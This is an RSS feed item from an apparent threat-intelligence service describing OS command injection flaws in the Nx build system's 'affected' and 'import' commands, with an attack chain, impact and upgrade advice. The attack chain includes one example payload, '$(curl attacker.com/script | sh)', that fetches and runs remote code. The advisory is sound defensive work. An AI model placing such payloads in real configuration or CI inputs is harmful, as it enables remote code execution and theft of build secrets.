<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:webfeeds="http://webfeeds.org/rss/1.0"><channel><title>Nx (14.6.0-22.7.8, 23.0.0-23.1.1) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/nx-14.6.0-22.7.8-23.0.0-23.1.1/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Tue, 06 Oct 2026 00:45:33 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/nx-14.6.0-22.7.8-23.0.0-23.1.1/feed.xml" rel="self" type="application/rss+xml"/><image><url>https://feed.craftedsignal.io/favicon-32x32.png</url><title>CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/</link><width>32</width><height>32</height></image><webfeeds:icon>https://feed.craftedsignal.io/favicon.svg</webfeeds:icon><item><title>OS Command Injection in Nx via Git Revisions and Remote Refs</title><link>https://feed.craftedsignal.io/briefs/2026-10-nx-command-injection/</link><pubDate>Tue, 06 Oct 2026 00:45:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-10-nx-command-injection/</guid><description>The Nx build system contains OS command injection vulnerabilities in `nx affected` and `nx import` commands, allowing attackers to execute arbitrary code via malicious git revision strings or remote branch names.</description><content:encoded><![CDATA[<p>Nx core is vulnerable to multiple OS command injection flaws where untrusted git inputs are interpolated into shell command strings. The vulnerabilities exist in two primary workflows: <code>affected</code> commands and <code>nx import</code>. In the <code>affected</code> workflow, values from <code>nx.json</code> (<code>defaultBase</code> / <code>affected.defaultBase</code>) or the <code>NX_BASE</code> / <code>NX_HEAD</code> environment variables are used to construct <code>git</code> commands. Because these strings are processed by <code>/bin/sh</code> without proper sanitization, an attacker can inject command substitution payloads using <code>$(...)</code> syntax, even when wrapped in double quotes.</p>
<p>In the <code>nx import</code> workflow, the <code>GitRepository</code> helper interpolates remote branch names - controlled by the owner of a remote repository - into various <code>git</code> operations including <code>fetch</code>, <code>checkout</code>, and <code>config</code>. An attacker who controls a repository can force arbitrary command execution on any machine that runs an <code>nx</code> command against it. This is particularly critical in CI/CD environments where pull requests containing modified <code>nx.json</code> files are automatically processed by runners. This vulnerability affects Nx versions &gt;= 14.0.0 and &lt; 22.7.8, and versions 23.0.0 to 23.1.0.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious repository or a pull request containing a manipulated <code>nx.json</code> file.</li>
<li>The attacker modifies the <code>defaultBase</code> or <code>affected.defaultBase</code> field in <code>nx.json</code> to include shell command substitution payloads (e.g., <code>$(curl attacker.com/script | sh)</code>).</li>
<li>A victim (developer or CI/CD runner) clones the repository or fetches the attacker's pull request branch.</li>
<li>The victim executes a standard Nx command, such as <code>nx affected</code> or <code>nx show projects --affected</code>.</li>
<li>The Nx CLI reads the manipulated <code>nx.json</code> configuration and builds a <code>git merge-base</code> or <code>git diff</code> shell command string containing the malicious payload.</li>
<li>The system executes the resulting string via <code>/bin/sh</code>, triggering the command substitution and executing the attacker's code.</li>
<li>The attacker's payload executes with the privileges of the victim user or CI service account.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows for arbitrary command execution on developer workstations or CI/CD build servers. If triggered in a CI environment, this could lead to full compromise of the build pipeline, exfiltration of environment secrets (e.g., cloud credentials, API keys), or the injection of malicious code into downstream software artifacts. There are no known instances of exploitation in the wild at this time, but the vector is highly accessible to anyone capable of submitting a pull request to an Nx-based project.</p>
<h2 id="recommendation">Recommendation</h2>
<p>Prioritized actions for security teams:</p>
<ul>
<li>Upgrade all instances of <code>nx</code> to version 22.7.8 or 23.1.1 immediately using the <code>nx migrate</code> command.</li>
<li>For CI/CD environments, audit build configurations to ensure that <code>nx.json</code> files from untrusted sources or external pull requests are treated as untrusted and not processed automatically in privileged contexts.</li>
<li>Monitor CI/CD logs for unexpected child processes spawned by the <code>nx</code> CLI or related <code>git</code> sub-processes.</li>
<li>Restrict <code>nx import</code> usage to verified and trusted repositories only.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>command-injection</category><category>build-system</category><category>ci-cd</category><category>remote-code-execution</category><category>vulnerability</category><category>local-exploitation</category><category>privilege-escalation</category></item></channel></rss>